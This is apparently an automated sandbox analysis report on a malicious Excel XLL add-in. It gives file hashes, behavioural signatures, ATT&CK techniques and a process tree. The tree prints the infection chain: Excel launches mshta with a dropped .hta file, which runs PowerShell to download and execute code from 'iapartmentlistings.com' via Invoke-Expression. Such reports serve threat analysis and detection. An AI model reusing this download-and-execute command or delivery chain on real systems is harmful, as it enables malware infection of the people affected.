Analysis

  • max time kernel
    137s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 01:29

General

  • Target

    0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6.xll

  • Size

    12KB

  • MD5

    9c29fa879f4bb516bf284091f214578f

  • SHA1

    7fb01e0e2f8f4fd269e68defccbaad8edfb7f53f

  • SHA256

    0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6

  • SHA512

    d3a813ce0089dd307825e3c7de54766772cb3b7cb600b1feba880cf0bc11306fcc429a28836e00ffe641921a7ac4bfe87c5c7d6a6cc43d1a2c29e5b72557e88b

  • SSDEEP

    192:hL29RBzDzeobchBj8JONRONatruGrEPEjr7Ahe:x29jnbcvYJOuwuGvr7Ce

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6.xll"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2648
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\users\public\example.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} mshta
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1320
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4840

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6TQEXKX3\d[1].htm
    Filesize

    2KB

    MD5

    f754844cfb65838d1dd6b19dde5d835c

    SHA1

    b3eb677783adc88c8d048898449e04d49f416db6

    SHA256

    3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

    SHA512

    f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

  • C:\Users\Admin\AppData\Local\Temp\0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6.xll
    Filesize

    12KB

    MD5

    9c29fa879f4bb516bf284091f214578f

    SHA1

    7fb01e0e2f8f4fd269e68defccbaad8edfb7f53f

    SHA256

    0c80a5b85e5c183be0e72555a6cbb01373aa6786f5cd9c6b1b33ed0b2c0626a6

    SHA512

    d3a813ce0089dd307825e3c7de54766772cb3b7cb600b1feba880cf0bc11306fcc429a28836e00ffe641921a7ac4bfe87c5c7d6a6cc43d1a2c29e5b72557e88b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z2elhu2b.vwp.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2648-11-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-6-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-7-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-5-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp
    Filesize

    64KB

  • memory/2648-8-0x00007FFED5570000-0x00007FFED5580000-memory.dmp
    Filesize

    64KB

  • memory/2648-9-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-2-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp
    Filesize

    64KB

  • memory/2648-13-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-10-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-14-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-16-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-17-0x00007FFED5570000-0x00007FFED5580000-memory.dmp
    Filesize

    64KB

  • memory/2648-18-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-19-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-15-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-12-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-0-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp
    Filesize

    64KB

  • memory/2648-3-0x00007FFF178AD000-0x00007FFF178AE000-memory.dmp
    Filesize

    4KB

  • memory/2648-1-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp
    Filesize

    64KB

  • memory/2648-89-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/2648-87-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp
    Filesize

    64KB

  • memory/2648-88-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp
    Filesize

    64KB

  • memory/2648-86-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp
    Filesize

    64KB

  • memory/2648-85-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp
    Filesize

    64KB

  • memory/2648-4-0x00007FFED7890000-0x00007FFED78A0000-memory.dmp
    Filesize

    64KB

  • memory/2648-69-0x00007FFF17810000-0x00007FFF17A05000-memory.dmp
    Filesize

    2.0MB

  • memory/4840-59-0x00000000068B0000-0x00000000068CE000-memory.dmp
    Filesize

    120KB

  • memory/4840-60-0x00000000068D0000-0x000000000691C000-memory.dmp
    Filesize

    304KB

  • memory/4840-61-0x00000000080D0000-0x000000000874A000-memory.dmp
    Filesize

    6.5MB

  • memory/4840-62-0x0000000006DA0000-0x0000000006DBA000-memory.dmp
    Filesize

    104KB

  • memory/4840-58-0x00000000062C0000-0x0000000006614000-memory.dmp
    Filesize

    3.3MB

  • memory/4840-48-0x0000000006250000-0x00000000062B6000-memory.dmp
    Filesize

    408KB

  • memory/4840-47-0x00000000061E0000-0x0000000006246000-memory.dmp
    Filesize

    408KB

  • memory/4840-46-0x0000000005900000-0x0000000005922000-memory.dmp
    Filesize

    136KB

  • memory/4840-45-0x0000000005980000-0x0000000005FA8000-memory.dmp
    Filesize

    6.2MB

  • memory/4840-44-0x0000000005310000-0x0000000005346000-memory.dmp
    Filesize

    216KB